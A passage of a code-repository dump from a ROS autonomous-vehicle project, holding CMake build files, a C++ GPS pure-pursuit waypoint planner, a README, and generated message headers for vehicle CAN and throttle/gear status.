add_dependencies(steer_generate_messages_nodejs std_msgs_generate_messages_nodejs)\nendif()\nif(TARGET geometry_msgs_generate_messages_nodejs)\n add_dependencies(steer_generate_messages_nodejs geometry_msgs_generate_messages_nodejs)\nendif()\nif(TARGET zf_msgs_generate_messages_nodejs)\n add_dependencies(steer_generate_messages_nodejs zf_msgs_generate_messages_nodejs)\nendif()\n\nif(genpy_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/steer)\n install(CODE \"execute_process(COMMAND \\\"/usr/bin/python\\\" -m compileall \\\"${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/steer\\\")\")\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/steer\n DESTINATION ${genpy_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_py)\n add_dependencies(steer_generate_messages_py std_msgs_generate_messages_py)\nendif()\nif(TARGET geometry_msgs_generate_messages_py)\n add_dependencies(steer_generate_messages_py geometry_msgs_generate_messages_py)\nendif()\nif(TARGET zf_msgs_generate_messages_py)\n add_dependencies(steer_generate_messages_py zf_msgs_generate_messages_py)\nendif()\n"
},
{
"alpha_fraction": 0.5743434429168701,
"alphanum_fraction": 0.6066502928733826,
"avg_line_length": 30.694610595703125,
"blob_id": "bc3e1bf1a196d8b1578f1a4fe67e5e565973eb58",
"content_id": "b935903b6b0dce5b5a6e1931ef07ab12035ecd49",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5293,
"license_type": "no_license",
"max_line_length": 190,
"num_lines": 167,
"path": "/src/path/src/gps_planner.cpp",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "#include \"ros/ros.h\"\n#include \"std_msgs/String.h\"\n#include \"std_msgs/Float32.h\"\n#include \"std_msgs/Int32.h\"\n#include \"nav_msgs/Path.h\"\n#include \"geometry_msgs/Point.h\"\n#include \"geometry_msgs/PoseArray.h\"\n#include \"geometry_msgs/Pose2D.h\"\n#include \"zf_msgs/pos320.h\"\n#include \"zf_msgs/pose2dArray.h\"\n#include <cmath>\n#include <Eigen/Dense>\n#include <iostream>\n#include <fstream>\n\n/**\n * XUECHONG 2018.09.06, pure pursuit path following\n * 2018.09.10 version 1.0, completely\n */\n\n/// earth radius is [m]\nconst double EARTH_RADIUS = 6371008.8;\nconst double PI = std::acos(-1);\n\n/// important parameters, need fine-tuning\nconst int LOOP_RATE_ = 20;\nzf_msgs::pos320 cur_pose;\n\nbool is_pose_set = false;\n\n/// convert lat,lon to xyz\ninline Eigen::Vector3d getXYZ(const double &lat, const double &lon){\n Eigen::Vector3d e(std::cos(lat/180.0 * PI) * std::cos(lon/180 * PI), std::cos(lat/180.0 * PI) * std::sin(lon/180 * PI), std::sin(lat/180.0 * PI));\n e[0] *= EARTH_RADIUS;\n e[1] *= EARTH_RADIUS;\n e[2] *= EARTH_RADIUS;\n return e;\n}\n\ninline Eigen::Vector3d getXYZe(const double &lat, const double &lon){\n Eigen::Vector3d e(std::cos(lat/180.0 * PI) * std::cos(lon/180 * PI), std::cos(lat/180.0 * PI) * std::sin(lon/180 * PI), std::sin(lat/180.0 * PI));\n return e;\n}\n\n//void currentPointCallback(const zf_msgs::pos320::ConstPtr& msg)\nvoid currentPointCallback(const zf_msgs::pos320& msg)\n{\n ///\n //ROS_INFO(\"I got current pose data: \");\n //ROS_INFO(msg->pose);\n cur_pose = msg;\n //std::cout<< cur_pose.lat << \"\\t\";\n //std::cout<< cur_pose.lon << \"\\n\";\n is_pose_set = true;\n}\n\nvoid loadMap(const std::string &filename, std::vector<Eigen::Vector3d> &map) {\n std::ifstream mapfile(filename);\n double lat, lon;\n while (mapfile >> lat >>lon) {\n map.push_back(getXYZ(lat,lon));\n std::cout<< std::setprecision(10)<< lat << \" \" << lon << std::endl;\n }\n std::cout << \"map length is \";\n std::cout<< map.size() << \"\\n\";\n}\n\nint main(int argc, char **argv)\n{\n /// load map\n std::vector<Eigen::Vector3d> map;\n loadMap(\"/home/zf/xuechong_ws/zhuifengShow0919/map/map.txt\",map);\n ROS_INFO_STREAM(\"finished loading map from file\");\n\n /// init node\n ros::init(argc, argv, \"path\");\n ros::NodeHandle n;\n /// subscribe current pos320 data and update is_pose_set\n ros::Subscriber subCurrentPoint = n.subscribe(\"pos320_pose\", 1000, currentPointCallback);\n /// publish waypoints\n ros::Publisher pubWaypoints = n.advertise<zf_msgs::pose2dArray>(\"gps_waypoints\", 1000);\n\n ROS_INFO_STREAM(\"pure pursuit start\");\n //ros::Rate loop_rate(LOOP_RATE_);\n ros::Rate loop_rate(20);\n while (ros::ok())\n {\n ros::spinOnce();\n if (!is_pose_set)\n {\n //ROS_WARN(\"Necessary current pos320 topics are not subscribed yet ... \");\n loop_rate.sleep();\n continue;\n }\n is_pose_set = false;\n\n /// current point n vector is, n is normal vector\n /// computing current faxiangliang, that is current coordinate\n Eigen::Vector3d n_vector = getXYZ(cur_pose.lat, cur_pose.lon);\n /// unit vector of faxiangliang\n Eigen::Vector3d ne_vector = getXYZe(cur_pose.lat, cur_pose.lon);\n /// nn\n Eigen::Vector3d nn_vector(-1 * ne_vector[0] * std::abs(ne_vector[2]), -1 * ne_vector[1] * std::abs(ne_vector[2]), std::abs(std::pow(ne_vector[0] ,2) + std::pow(ne_vector[1] ,2)) );\n /// \n Eigen::AngleAxisd rotation(cur_pose.head/ -180.0 * PI , ne_vector);\n Eigen::Vector3d now_forward = rotation * nn_vector;\n now_forward = now_forward.normalized();\n \n rotation = Eigen::AngleAxisd( (90 + cur_pose.head)/ -180.0 * PI , ne_vector);\n Eigen::Vector3d now_right = rotation * nn_vector;\n now_right = now_right.normalized();\n\n double dis = 999;\n int index = 0;\n int mark = 0;\n double right_dis = 0;\n double forward_dis = 0;\n \n for(Eigen::Vector3d &road_point:map){\n Eigen::Vector3d u_v = road_point - n_vector;\n ///std::cout<< road_point << \"\\n\\n\";\n ///std::cout<< n_vector << \"\\n\\n\";\n ///std::cout<< u_v << \"\\n\\n\";\n double forward = u_v.dot(now_forward);\n double right = u_v.dot(now_right);\n double temp = std::sqrt( std::pow(forward,2) + std::pow(right,2) );\n //if(temp< 20){std::cout<<temp << std::endl;}\n if(temp < dis && forward > 0){\n dis = temp;\n mark = index;\n right_dis = right;\n forward_dis = forward;\n }\n ++index;\n }\n std::cout<<\"nearest index:\"<< index << \"\\n\";\n std::cout<<\"nearest dis:\" << dis << \"\\n\";\n std::cout<<\" x y is \" << right_dis << \"\\t\" << forward_dis << \"\\n\\n\\n\";\n\n zf_msgs::pose2dArray waypoints;\n index = 0;\n for(int i=mark;i < map.size(); i++){\n Eigen::Vector3d u_v = map[i] - n_vector;\n double forward = u_v.dot(now_forward);\n double right = u_v.dot(now_right);\n double bias = std::sqrt( std::pow(right,2) + std::pow(forward,2) );\n /// distance between points from map must be longer than 0.4 meters\n if(bias - dis < 0.4 )\n {\n continue;\n }\n dis = bias;\n geometry_msgs::Pose2D pp;\n pp.x = right;\n pp.y = forward;\n pp.theta = 0;\n waypoints.points.push_back(pp);\n ++index;\n if(index > 50){break;}\n }\n pubWaypoints.publish(waypoints);\n std::cout<<\"planning ...\" <<\"\\n\";\n loop_rate.sleep();\n }\n\n return 0;\n}\n"
},
{
"alpha_fraction": 0.6706587076187134,
"alphanum_fraction": 0.7005987763404846,
"avg_line_length": 22.714284896850586,
"blob_id": "34af6502c38a54222054875eafa4228e5ab9f480",
"content_id": "60666feb4add0c5fd1b7323f5e2ec07d5593d3a7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 334,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 14,
"path": "/src/path/README.md",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "\n##gps planner\n\nsubscribed topics:\n pos320_pose, type is zf_msgs::pos320\n\npublished topics:\n gps_waypoints, type is zf_msgs::pose2dArray\n\n\n###map \n type is std::vector<Eigen::Vector3d> map\n loaded from a mapfile, filename is filled in line 66\n convert to x,y,z soon after loading it\n so, map is consitituted by (x,y,z)\n\n"
},
{
"alpha_fraction": 0.7626628279685974,
"alphanum_fraction": 0.7973950505256653,
"avg_line_length": 48.35714340209961,
"blob_id": "9109de20ad359fcfe9bec17bd851c8917d4b89b0",
"content_id": "1cf242265b3cfabd754e38fd19f1f8e5b80eb61e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 691,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 14,
"path": "/build/zfmsg/CMakeFiles/zfmsg_generate_messages_cpp.dir/cmake_clean.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "file(REMOVE_RECURSE\n \"CMakeFiles/zfmsg_generate_messages_cpp\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/include/zfmsg/BreakStatus.h\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/include/zfmsg/SteerStatus.h\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/include/zfmsg/ThrottleGearStatus.h\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/include/zfmsg/MotionCmd.h\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/include/zfmsg/CanInfo.h\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/include/zfmsg/CanInfoAW.h\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang )\n include(CMakeFiles/zfmsg_generate_messages_cpp.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n"
},
{
"alpha_fraction": 0.7524949908256531,
"alphanum_fraction": 0.7844311594963074,
"avg_line_length": 44.54545593261719,
"blob_id": "cf8db771de5dbce0c4ceccab591663c52611e7ad",
"content_id": "54f8e9dcb53c6049c22316e46a0173c291a3ce7c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 501,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 11,
"path": "/build/zf_msgs/CMakeFiles/zf_msgs_generate_messages_eus.dir/cmake_clean.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "file(REMOVE_RECURSE\n \"CMakeFiles/zf_msgs_generate_messages_eus\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/roseus/ros/zf_msgs/msg/pos320.l\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/roseus/ros/zf_msgs/msg/pose2dArray.l\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/roseus/ros/zf_msgs/manifest.l\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang )\n include(CMakeFiles/zf_msgs_generate_messages_eus.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n"
},
{
"alpha_fraction": 0.6612967848777771,
"alphanum_fraction": 0.6753342151641846,
"avg_line_length": 30.101871490478516,
"blob_id": "eb5599ab71310603aff7159fe833dc8ea57d097e",
"content_id": "5dacf8a3b93f868cbfe5e5ab94f5005251febfd8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 14960,
"license_type": "no_license",
"max_line_length": 441,
"num_lines": 481,
"path": "/devel/include/zfmsg/CanInfo.h",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "// Generated by gencpp from file zfmsg/CanInfo.msg\n// DO NOT EDIT!\n\n\n#ifndef ZFMSG_MESSAGE_CANINFO_H\n#define ZFMSG_MESSAGE_CANINFO_H\n\n\n#include <string>\n#include <vector>\n#include <map>\n\n#include <ros/types.h>\n#include <ros/serialization.h>\n#include <ros/builtin_message_traits.h>\n#include <ros/message_operations.h>\n\n#include <std_msgs/Header.h>\n\nnamespace zfmsg\n{\ntemplate <class ContainerAllocator>\nstruct CanInfo_\n{\n typedef CanInfo_<ContainerAllocator> Type;\n\n CanInfo_()\n : header()\n , ts(0)\n , controlMode(0)\n , brakePressure(0.0)\n , brakeSpeed(0.0)\n , targetBrakePressure(0.0)\n , targetBrakeSpeed(0.0)\n , targetBrakePosition(0.0)\n , brakePosition(0.0)\n , breakPedalOn(false)\n , breakMotorCurrent(0.0)\n , breakErrorCode(0)\n , steerAngle(0.0)\n , steerSpeed(0.0)\n , targetSteerAngle(0.0)\n , targetSteerSpeed(0.0)\n , steerMotorTemperature(0.0)\n , steerMotorCurrent(0.0)\n , steerTorque(0.0)\n , resultSetMiddleZero(0.0)\n , steerErrorCode(0)\n , mainMotorSpeed(0.0)\n , mainMotorCurrent(0.0)\n , motorBreakOn(0)\n , throtle(0.0)\n , gear()\n , targetThrotle(0.0)\n , targetGear()\n , gearLeverPosition()\n , mainMotorBreakOn(false)\n , throttleErrorCode(0) {\n }\n CanInfo_(const ContainerAllocator& _alloc)\n : header(_alloc)\n , ts(0)\n , controlMode(0)\n , brakePressure(0.0)\n , brakeSpeed(0.0)\n , targetBrakePressure(0.0)\n , targetBrakeSpeed(0.0)\n , targetBrakePosition(0.0)\n , brakePosition(0.0)\n , breakPedalOn(false)\n , breakMotorCurrent(0.0)\n , breakErrorCode(0)\n , steerAngle(0.0)\n , steerSpeed(0.0)\n , targetSteerAngle(0.0)\n , targetSteerSpeed(0.0)\n , steerMotorTemperature(0.0)\n , steerMotorCurrent(0.0)\n , steerTorque(0.0)\n , resultSetMiddleZero(0.0)\n , steerErrorCode(0)\n , mainMotorSpeed(0.0)\n , mainMotorCurrent(0.0)\n , motorBreakOn(0)\n , throtle(0.0)\n , gear(_alloc)\n , targetThrotle(0.0)\n , targetGear(_alloc)\n , gearLeverPosition(_alloc)\n , mainMotorBreakOn(false)\n , throttleErrorCode(0) {\n (void)_alloc;\n }\n\n\n\n typedef ::std_msgs::Header_<ContainerAllocator> _header_type;\n _header_type header;\n\n typedef int64_t _ts_type;\n _ts_type ts;\n\n typedef uint8_t _controlMode_type;\n _controlMode_type controlMode;\n\n typedef float _brakePressure_type;\n _brakePressure_type brakePressure;\n\n typedef float _brakeSpeed_type;\n _brakeSpeed_type brakeSpeed;\n\n typedef float _targetBrakePressure_type;\n _targetBrakePressure_type targetBrakePressure;\n\n typedef float _targetBrakeSpeed_type;\n _targetBrakeSpeed_type targetBrakeSpeed;\n\n typedef float _targetBrakePosition_type;\n _targetBrakePosition_type targetBrakePosition;\n\n typedef float _brakePosition_type;\n _brakePosition_type brakePosition;\n\n typedef uint8_t _breakPedalOn_type;\n _breakPedalOn_type breakPedalOn;\n\n typedef float _breakMotorCurrent_type;\n _breakMotorCurrent_type breakMotorCurrent;\n\n typedef uint8_t _breakErrorCode_type;\n _breakErrorCode_type breakErrorCode;\n\n typedef float _steerAngle_type;\n _steerAngle_type steerAngle;\n\n typedef float _steerSpeed_type;\n _steerSpeed_type steerSpeed;\n\n typedef float _targetSteerAngle_type;\n _targetSteerAngle_type targetSteerAngle;\n\n typedef float _targetSteerSpeed_type;\n _targetSteerSpeed_type targetSteerSpeed;\n\n typedef float _steerMotorTemperature_type;\n _steerMotorTemperature_type steerMotorTemperature;\n\n typedef float _steerMotorCurrent_type;\n _steerMotorCurrent_type steerMotorCurrent;\n\n typedef float _steerTorque_type;\n _steerTorque_type steerTorque;\n\n typedef float _resultSetMiddleZero_type;\n _resultSetMiddleZero_type resultSetMiddleZero;\n\n typedef uint8_t _steerErrorCode_type;\n _steerErrorCode_type steerErrorCode;\n\n typedef float _mainMotorSpeed_type;\n _mainMotorSpeed_type mainMotorSpeed;\n\n typedef float _mainMotorCurrent_type;\n _mainMotorCurrent_type mainMotorCurrent;\n\n typedef uint8_t _motorBreakOn_type;\n _motorBreakOn_type motorBreakOn;\n\n typedef float _throtle_type;\n _throtle_type throtle;\n\n typedef std::basic_string<char, std::char_traits<char>, typename ContainerAllocator::template rebind<char>::other > _gear_type;\n _gear_type gear;\n\n typedef float _targetThrotle_type;\n _targetThrotle_type targetThrotle;\n\n typedef std::basic_string<char, std::char_traits<char>, typename ContainerAllocator::template rebind<char>::other > _targetGear_type;\n _targetGear_type targetGear;\n\n typedef std::basic_string<char, std::char_traits<char>, typename ContainerAllocator::template rebind<char>::other > _gearLeverPosition_type;\n _gearLeverPosition_type gearLeverPosition;\n\n typedef uint8_t _mainMotorBreakOn_type;\n _mainMotorBreakOn_type mainMotorBreakOn;\n\n typedef uint8_t _throttleErrorCode_type;\n _throttleErrorCode_type throttleErrorCode;\n\n\n\n\n\n typedef boost::shared_ptr< ::zfmsg::CanInfo_<ContainerAllocator> > Ptr;\n typedef boost::shared_ptr< ::zfmsg::CanInfo_<ContainerAllocator> const> ConstPtr;\n\n}; // struct CanInfo_\n\ntypedef ::zfmsg::CanInfo_<std::allocator<void> > CanInfo;\n\ntypedef boost::shared_ptr< ::zfmsg::CanInfo > CanInfoPtr;\ntypedef boost::shared_ptr< ::zfmsg::CanInfo const> CanInfoConstPtr;\n\n// constants requiring out of line definition\n\n\n\ntemplate<typename ContainerAllocator>\nstd::ostream& operator<<(std::ostream& s, const ::zfmsg::CanInfo_<ContainerAllocator> & v)\n{\nros::message_operations::Printer< ::zfmsg::CanInfo_<ContainerAllocator> >::stream(s, \"\", v);\nreturn s;\n}\n\n} // namespace zfmsg\n\nnamespace ros\n{\nnamespace message_traits\n{\n\n\n\n// BOOLTRAITS {'IsFixedSize': False, 'IsMessage': True, 'HasHeader': True}\n// {'std_msgs': ['/opt/ros/kinetic/share/std_msgs/cmake/../msg'], 'zfmsg': ['/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg']}\n\n// !!!!!!!!!!! ['__class__', '__delattr__', '__dict__', '__doc__', '__eq__', '__format__', '__getattribute__', '__hash__', '__init__', '__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__weakref__', '_parsed_fields', 'constants', 'fields', 'full_name', 'has_header', 'header_present', 'names', 'package', 'parsed_fields', 'short_name', 'text', 'types']\n\n\n\n\ntemplate <class ContainerAllocator>\nstruct IsFixedSize< ::zfmsg::CanInfo_<ContainerAllocator> >\n : FalseType\n { };\n\ntemplate <class ContainerAllocator>\nstruct IsFixedSize< ::zfmsg::CanInfo_<ContainerAllocator> const>\n : FalseType\n { };\n\ntemplate <class ContainerAllocator>\nstruct IsMessage< ::zfmsg::CanInfo_<ContainerAllocator> >\n : TrueType\n { };\n\ntemplate <class ContainerAllocator>\nstruct IsMessage< ::zfmsg::CanInfo_<ContainerAllocator> const>\n : TrueType\n { };\n\ntemplate <class ContainerAllocator>\nstruct HasHeader< ::zfmsg::CanInfo_<ContainerAllocator> >\n : TrueType\n { };\n\ntemplate <class ContainerAllocator>\nstruct HasHeader< ::zfmsg::CanInfo_<ContainerAllocator> const>\n : TrueType\n { };\n\n\ntemplate<class ContainerAllocator>\nstruct MD5Sum< ::zfmsg::CanInfo_<ContainerAllocator> >\n{\n static const char* value()\n {\n return \"9e711434ed4a101e8ef41cf060e99e89\";\n }\n\n static const char* value(const ::zfmsg::CanInfo_<ContainerAllocator>&) { return value(); }\n static const uint64_t static_value1 = 0x9e711434ed4a101eULL;\n static const uint64_t static_value2 = 0x8ef41cf060e99e89ULL;\n};\n\ntemplate<class ContainerAllocator>\nstruct DataType< ::zfmsg::CanInfo_<ContainerAllocator> >\n{\n static const char* value()\n {\n return \"zfmsg/CanInfo\";\n }\n\n static const char* value(const ::zfmsg::CanInfo_<ContainerAllocator>&) { return value(); }\n};\n\ntemplate<class ContainerAllocator>\nstruct Definition< ::zfmsg::CanInfo_<ContainerAllocator> >\n{\n static const char* value()\n {\n return \"std_msgs/Header header\\n\\\nint64 ts\\n\\\nuint8 controlMode\\n\\\nfloat32 brakePressure\\n\\\nfloat32 brakeSpeed\\n\\\nfloat32 targetBrakePressure\\n\\\nfloat32 targetBrakeSpeed\\n\\\nfloat32 targetBrakePosition\\n\\\nfloat32 brakePosition\\n\\\nbool \t breakPedalOn\\n\\\nfloat32 breakMotorCurrent\\n\\\nuint8 breakErrorCode\\n\\\n\\n\\\nfloat32 steerAngle\\n\\\nfloat32 steerSpeed\\n\\\nfloat32 targetSteerAngle\\n\\\nfloat32 targetSteerSpeed\\n\\\nfloat32 steerMotorTemperature\\n\\\nfloat32 steerMotorCurrent\\n\\\nfloat32\t steerTorque\\n\\\nfloat32 resultSetMiddleZero\\n\\\nuint8 steerErrorCode\\n\\\n\\n\\\n\\n\\\n\\n\\\nfloat32 mainMotorSpeed\\n\\\nfloat32 mainMotorCurrent\\n\\\nuint8 motorBreakOn\\n\\\nfloat32 throtle\\n\\\nstring gear\\n\\\nfloat32 targetThrotle\\n\\\nstring targetGear\\n\\\nstring gearLeverPosition\\n\\\nbool mainMotorBreakOn\\n\\\nuint8 throttleErrorCode\\n\\\n\\n\\\n================================================================================\\n\\\nMSG: std_msgs/Header\\n\\\n# Standard metadata for higher-level stamped data types.\\n\\\n# This is generally used to communicate timestamped data \\n\\\n# in a particular coordinate frame.\\n\\\n# \\n\\\n# sequence ID: consecutively increasing ID \\n\\\nuint32 seq\\n\\\n#Two-integer timestamp that is expressed as:\\n\\\n# * stamp.sec: seconds (stamp_secs) since epoch (in Python the variable is called 'secs')\\n\\\n# * stamp.nsec: nanoseconds since stamp_secs (in Python the variable is called 'nsecs')\\n\\\n# time-handling sugar is provided by the client library\\n\\\ntime stamp\\n\\\n#Frame this data is associated with\\n\\\n# 0: no frame\\n\\\n# 1: global frame\\n\\\nstring frame_id\\n\\\n\";\n }\n\n static const char* value(const ::zfmsg::CanInfo_<ContainerAllocator>&) { return value(); }\n};\n\n} // namespace message_traits\n} // namespace ros\n\nnamespace ros\n{\nnamespace serialization\n{\n\n template<class ContainerAllocator> struct Serializer< ::zfmsg::CanInfo_<ContainerAllocator> >\n {\n template<typename Stream, typename T> inline static void allInOne(Stream& stream, T m)\n {\n stream.next(m.header);\n stream.next(m.ts);\n stream.next(m.controlMode);\n stream.next(m.brakePressure);\n stream.next(m.brakeSpeed);\n stream.next(m.targetBrakePressure);\n stream.next(m.targetBrakeSpeed);\n stream.next(m.targetBrakePosition);\n stream.next(m.brakePosition);\n stream.next(m.breakPedalOn);\n stream.next(m.breakMotorCurrent);\n stream.next(m.breakErrorCode);\n stream.next(m.steerAngle);\n stream.next(m.steerSpeed);\n stream.next(m.targetSteerAngle);\n stream.next(m.targetSteerSpeed);\n stream.next(m.steerMotorTemperature);\n stream.next(m.steerMotorCurrent);\n stream.next(m.steerTorque);\n stream.next(m.resultSetMiddleZero);\n stream.next(m.steerErrorCode);\n stream.next(m.mainMotorSpeed);\n stream.next(m.mainMotorCurrent);\n stream.next(m.motorBreakOn);\n stream.next(m.throtle);\n stream.next(m.gear);\n stream.next(m.targetThrotle);\n stream.next(m.targetGear);\n stream.next(m.gearLeverPosition);\n stream.next(m.mainMotorBreakOn);\n stream.next(m.throttleErrorCode);\n }\n\n ROS_DECLARE_ALLINONE_SERIALIZER\n }; // struct CanInfo_\n\n} // namespace serialization\n} // namespace ros\n\nnamespace ros\n{\nnamespace message_operations\n{\n\ntemplate<class ContainerAllocator>\nstruct Printer< ::zfmsg::CanInfo_<ContainerAllocator> >\n{\n template<typename Stream> static void stream(Stream& s, const std::string& indent, const ::zfmsg::CanInfo_<ContainerAllocator>& v)\n {\n s << indent << \"header: \";\n s << std::endl;\n Printer< ::std_msgs::Header_<ContainerAllocator> >::stream(s, indent + \" \", v.header);\n s << indent << \"ts: \";\n Printer<int64_t>::stream(s, indent + \" \", v.ts);\n s << indent << \"controlMode: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.controlMode);\n s << indent << \"brakePressure: \";\n Printer<float>::stream(s, indent + \" \", v.brakePressure);\n s << indent << \"brakeSpeed: \";\n Printer<float>::stream(s, indent + \" \", v.brakeSpeed);\n s << indent << \"targetBrakePressure: \";\n Printer<float>::stream(s, indent + \" \", v.targetBrakePressure);\n s << indent << \"targetBrakeSpeed: \";\n Printer<float>::stream(s, indent + \" \", v.targetBrakeSpeed);\n s << indent << \"targetBrakePosition: \";\n Printer<float>::stream(s, indent + \" \", v.targetBrakePosition);\n s << indent << \"brakePosition: \";\n Printer<float>::stream(s, indent + \" \", v.brakePosition);\n s << indent << \"breakPedalOn: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.breakPedalOn);\n s << indent << \"breakMotorCurrent: \";\n Printer<float>::stream(s, indent + \" \", v.breakMotorCurrent);\n s << indent << \"breakErrorCode: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.breakErrorCode);\n s << indent << \"steerAngle: \";\n Printer<float>::stream(s, indent + \" \", v.steerAngle);\n s << indent << \"steerSpeed: \";\n Printer<float>::stream(s, indent + \" \", v.steerSpeed);\n s << indent << \"targetSteerAngle: \";\n Printer<float>::stream(s, indent + \" \", v.targetSteerAngle);\n s << indent << \"targetSteerSpeed: \";\n Printer<float>::stream(s, indent + \" \", v.targetSteerSpeed);\n s << indent << \"steerMotorTemperature: \";\n Printer<float>::stream(s, indent + \" \", v.steerMotorTemperature);\n s << indent << \"steerMotorCurrent: \";\n Printer<float>::stream(s, indent + \" \", v.steerMotorCurrent);\n s << indent << \"steerTorque: \";\n Printer<float>::stream(s, indent + \" \", v.steerTorque);\n s << indent << \"resultSetMiddleZero: \";\n Printer<float>::stream(s, indent + \" \", v.resultSetMiddleZero);\n s << indent << \"steerErrorCode: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.steerErrorCode);\n s << indent << \"mainMotorSpeed: \";\n Printer<float>::stream(s, indent + \" \", v.mainMotorSpeed);\n s << indent << \"mainMotorCurrent: \";\n Printer<float>::stream(s, indent + \" \", v.mainMotorCurrent);\n s << indent << \"motorBreakOn: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.motorBreakOn);\n s << indent << \"throtle: \";\n Printer<float>::stream(s, indent + \" \", v.throtle);\n s << indent << \"gear: \";\n Printer<std::basic_string<char, std::char_traits<char>, typename ContainerAllocator::template rebind<char>::other > >::stream(s, indent + \" \", v.gear);\n s << indent << \"targetThrotle: \";\n Printer<float>::stream(s, indent + \" \", v.targetThrotle);\n s << indent << \"targetGear: \";\n Printer<std::basic_string<char, std::char_traits<char>, typename ContainerAllocator::template rebind<char>::other > >::stream(s, indent + \" \", v.targetGear);\n s << indent << \"gearLeverPosition: \";\n Printer<std::basic_string<char, std::char_traits<char>, typename ContainerAllocator::template rebind<char>::other > >::stream(s, indent + \" \", v.gearLeverPosition);\n s << indent << \"mainMotorBreakOn: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.mainMotorBreakOn);\n s << indent << \"throttleErrorCode: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.throttleErrorCode);\n }\n};\n\n} // namespace message_operations\n} // namespace ros\n\n#endif // ZFMSG_MESSAGE_CANINFO_H\n"
},
{
"alpha_fraction": 0.6690524816513062,
"alphanum_fraction": 0.6807543635368347,
"avg_line_length": 28.636363983154297,
"blob_id": "223e95c6b8f8d8894fd430ebbd483cd2d57eb98f",
"content_id": "5cd3fc39709af5434542c466402f97d1ce7cf332",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 8802,
"license_type": "no_license",
"max_line_length": 441,
"num_lines": 297,
"path": "/devel/include/zfmsg/ThrottleGearStatus.h",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "// Generated by gencpp from file zfmsg/ThrottleGearStatus.msg\n// DO NOT EDIT!\n\n\n#ifndef ZFMSG_MESSAGE_THROTTLEGEARSTATUS_H\n#define ZFMSG_MESSAGE_THROTTLEGEARSTATUS_H\n\n\n#include <string>\n#include <vector>\n#include <map>\n\n#include <ros/types.h>\n#include <ros/serialization.h>\n#include <ros/builtin_message_traits.h>\n#include <ros/message_operations.h>\n\n#include <std_msgs/Header.h>\n\nnamespace zfmsg\n{\ntemplate <class ContainerAllocator>\nstruct ThrottleGearStatus_\n{\n typedef ThrottleGearStatus_<ContainerAllocator> Type;\n\n ThrottleGearStatus_()\n : header()\n , ts(0)\n , controlMode(0)\n , motorSpeed(0.0)\n , motorCurrent(0.0)\n , motorBreak(0)\n , throttle(0.0)\n , gear()\n , gearLeverPosition()\n , pedalBreak(0)\n , errorCode(0) {\n }\n ThrottleGearStatus_(const ContainerAllocator& _alloc)\n : header(_alloc)\n , ts(0)\n , controlMode(0)\n , motorSpeed(0.0)\n , motorCurrent(0.0)\n , motorBreak(0)\n , throttle(0.0)\n , gear(_alloc)\n , gearLeverPosition(_alloc)\n , pedalBreak(0)\n , errorCode(0) {\n (void)_alloc;\n }\n\n\n\n typedef ::std_msgs::Header_<ContainerAllocator> _header_type;\n _header_type header;\n\n typedef int64_t _ts_type;\n _ts_type ts;\n\n typedef uint8_t _controlMode_type;\n _controlMode_type controlMode;\n\n typedef float _motorSpeed_type;\n _motorSpeed_type motorSpeed;\n\n typedef float _motorCurrent_type;\n _motorCurrent_type motorCurrent;\n\n typedef uint8_t _motorBreak_type;\n _motorBreak_type motorBreak;\n\n typedef float _throttle_type;\n _throttle_type throttle;\n\n typedef std::basic_string<char, std::char_traits<char>, typename ContainerAllocator::template rebind<char>::other > _gear_type;\n _gear_type gear;\n\n typedef std::basic_string<char, std::char_traits<char>, typename ContainerAllocator::template rebind<char>::other > _gearLeverPosition_type;\n _gearLeverPosition_type gearLeverPosition;\n\n typedef uint8_t _pedalBreak_type;\n _pedalBreak_type pedalBreak;\n\n typedef uint8_t _errorCode_type;\n _errorCode_type errorCode;\n\n\n\n\n\n typedef boost::shared_ptr< ::zfmsg::ThrottleGearStatus_<ContainerAllocator> > Ptr;\n 